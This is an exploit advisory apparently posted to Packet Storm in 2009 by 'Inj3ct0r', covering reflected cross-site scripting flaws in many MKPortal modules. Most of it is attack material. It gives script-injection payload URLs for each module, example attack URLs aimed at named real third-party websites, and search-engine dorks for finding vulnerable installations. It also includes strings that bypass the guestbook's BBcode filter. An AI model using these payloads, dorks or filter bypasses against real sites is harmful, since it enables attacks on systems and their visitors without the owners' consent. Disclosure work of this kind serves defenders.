MKPortal Cross Site Scripting

2009-08-31T00:00:00
ID PACKETSTORM:80894
Type packetstorm
Reporter Inj3ct0r
Modified 2009-08-31T00:00:00

Description

                                        
                                            `=======================================  
MKPortal <= global module Vulnerability  
=======================================  
  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 0  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1  
  
#[+] Discovered By : Inj3ct0r  
#[+] Site : Inj3ct0r.com  
#[+] support e-mail : submit[at]inj3ct0r.com  
  
##################################################  
Vulnerable products: MKPortal module gbook Exploit  
Dork: "inurl:index.php?Ind=gbook"  
##################################################  
  
  
---------------------------------------------------------------------  
  
1. Multiple pXSS  
Vulnerability in the file index.php.  
  
Exploit:  
  
  
/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E  
/index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E  
/index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E  
  
  
Example:  
  
http://otradnoe.ru.net//index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E  
http://otradnoe.ru.net//index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E  
http://otradnoe.ru.net//index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E  
  
---------------------------------------------------------------------  
  
  
2. Insert prohibited bb-tags [img] and [url] in the message  
  
Vulnerability in the file index.php.  
A vulnerable piece of code:  
  
$message = stripslashes($message);   
$message = preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/i',$no_url,$message);   
$message = preg_replace('/\[IMG\](.+?)\[\/IMG\]/i',$no_img,$message);   
$message = str_replace("ttp","", $message);   
  
get around restrictions:  
  
[UttpRL=htttptp://inj3ct0r.com]inj3ct0r.com[/URL]  
[IMttpG]htttptps://inj3ct0r.org/image.php?i=1&dateline=[/IMG]  
  
  
##################################################  
Vulnerable products: MKPortal module whois Exploit  
Dork: "inurl:index.php?Ind=whois"  
##################################################  
  
  
1. pXSS  
Vulnerability in the file index.php.  
  
  
Exploit:   
  
/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E  
  
Example:  
  
http://kitimedia.com/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E  
  
  
##################################################  
Vulnerable products: MKPortal module lenta Exploit  
Dork: "inurl:index.php?ind=" graber lenta  
##################################################  
  
1. Multiple pXSS  
Vulnerability in the file index.php.  
  
Exploit:   
  
/index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E  
/index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E  
  
Example:  
  
http://www.nissanclub72.ru/index.php?ind=lentanews&output=%3Cscript%3Ealert(1)%3C/script%3E  
http://www.nissanclub72.ru/index.php?ind=lentanews&blocks=%3Cscript%3Ealert(1)%3C/script%3E  
  
  
####################################################  
Vulnerable products: MKPortal modules metric Exploit  
####################################################  
  
1. pXSS  
  
-----------------------------  
  
metric  
  
Exploit:   
  
/metric/?output=%3Cscript%3Ealert(1)%3C/script%3E  
/metric/?error=%3Cscript%3Ealert(1)%3C/script%3E  
/metric/?blocks=%3Cscript%3Ealert(1)%3C/script%3E  
  
------------------------------------------  
  
recommend  
  
Exploit:   
  
/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E  
  
Example:  
  
http://www.street-style.su/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E  
  
------------------------------------------  
  
anekdot  
  
Exploit:   
  
/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E  
/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E  
/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E  
  
Example:  
  
http://www.isranetclub.com/isra/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E  
http://www.isranetclub.com/isra/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E  
http://www.isranetclub.com/isra/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E  
  
---------------------------  
  
contact  
  
Exploit:  
  
/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E  
/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E  
/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E  
  
---------------------------  
  
speed connection   
  
Exploit:   
  
/speed/?output=%3Cscript%3Ealert(1)%3C/script%3E  
/speed/?blocks=%3Cscript%3Ealert(1)%3C/script%3E  
  
---------------------------  
  
horoscop   
  
Exploit:   
  
/index.php?ind=horoscop&blocks=%3Cscript%3Ealert(1)%3C/script%3E  
/index.php?ind=horoscop&output=%3Cscript%3Ealert(1)%3C/script%3E  
  
----------------------------  
  
phones   
  
Exploit:   
  
/catphones/index.php?output=%3Cscript%3Ealert(1)%3C/script%3E  
/catphones/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E  
  
  
In general, the vulnerability exists because of stupidity.   
the code is a variable that is formed during the execution of the script and she gradually  
appropriated the additional data. In the vulnerable code modules approximately as follows:  
  
<?   
//code   
if (/*some*/) {   
//some code   
vuln_var .= 'some content';   
} else {   
//some code   
vuln_var .= 'some content';   
}   
//some code   
echo $vuln_var;   
//some code   
?>  
  
  
  
This XSS extended to 90% of the modules for MKPortal from rusmkportal.ru =]  
  
  
----------------------------------------------  
  
ThE End =] Visit my proj3ct :  
  
http://inj3ct0r.com  
http://inj3ct0r.org  
http://inj3ct0r.net  
  
  
# ~ - [ [ : Inj3ct0r : ] ]`